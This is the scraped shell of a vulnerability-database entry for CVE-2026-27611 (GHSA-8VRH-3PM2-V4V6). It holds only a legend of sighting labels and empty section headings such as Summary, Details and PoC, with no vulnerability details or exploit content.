Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27611 (GCVE-0-2026-27611)

FKIE_CVE-2026-27611

GHSA-8VRH-3PM2-V4V6

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature